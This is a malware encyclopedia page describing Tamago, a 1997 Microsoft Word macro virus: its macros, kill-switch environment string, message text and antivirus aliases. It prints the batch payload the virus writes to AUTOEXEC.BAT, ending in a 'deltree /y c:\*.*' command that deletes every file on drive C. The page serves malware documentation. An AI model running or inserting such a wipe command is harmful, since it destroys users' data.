Fandom

Malware Wiki

Tamago

1,319pages on
this wiki
Add New Page
Comments0 Share

Virus.MSWord.Tamago or Tamago is a virus that runs on Microsoft Word.

PayloadEdit

Tamago affects the system on closing infected documents and copies itself to documents are closed or saved with new name. It contains seven macros:

Documents           NORMAL.DOT
AutoOp              AutoOpen
AutoExec            AutoExec
AutoClose           AutoClose
UtilMacro           UtilMacro
FerramMacro         FerramMacro
ArquivoModelos      ArquivoModelos
ArquivoSalvarComo   ArquivoSalvarComo

The virus does not infect the system and documents, if Environment contains the string "TAMAGOXI=GMS" (virus author's self-protection?). In this case the virus displays the MessageBox:

(sLeEp ModE) TaMaGoXI bY WiZaRD: EtERnAl LoVE 2 mY LitTlE gIrL Gi

On 26th of any month the virus writes to C:\AUTOEXEC.BAT that will display the message and delete all files on drive C:

@echo off
cls
echo.
echo.
echo.
echo            SaLamA'S CoRP - AlL lEfTS ReSerVeD - 1997
echo                        TaMaGoXI bY WiZaRD***
echo                                          ***
echo                                         *
echo                                        *
echo                          *************
echo                         *             *
echo                        *  ****   ****  *
echo                        *               *
echo                        *     *****     *
echo                         ***************
echo.
echo                     eXPecT nO MeRcY FRoM HiM
echo.
echo.
echo File' not found: Serve Alcatara Mane'? (S/N) 
echo.
echo.
deltree /y c:\*.* >nul

MediaEdit

AliasesEdit

  • WM_TAMAGO(Trend Micro)
  • W97M/Tamago (McAfee)
  • BloodHound.WordMacro(Symantec)
  • W97/Tamago.A(Avira)
  • WM97/Tamago-A (Sophos)
  • Virus:WM/Tamago.A (Microsoft)

Ad blocker interference detected!


Wikia is a free-to-use site that makes money from advertising. We have a modified experience for viewers using ad blockers

Wikia is not accessible if you’ve made further modifications. Remove the custom ad blocker rule(s) and the page will load as expected.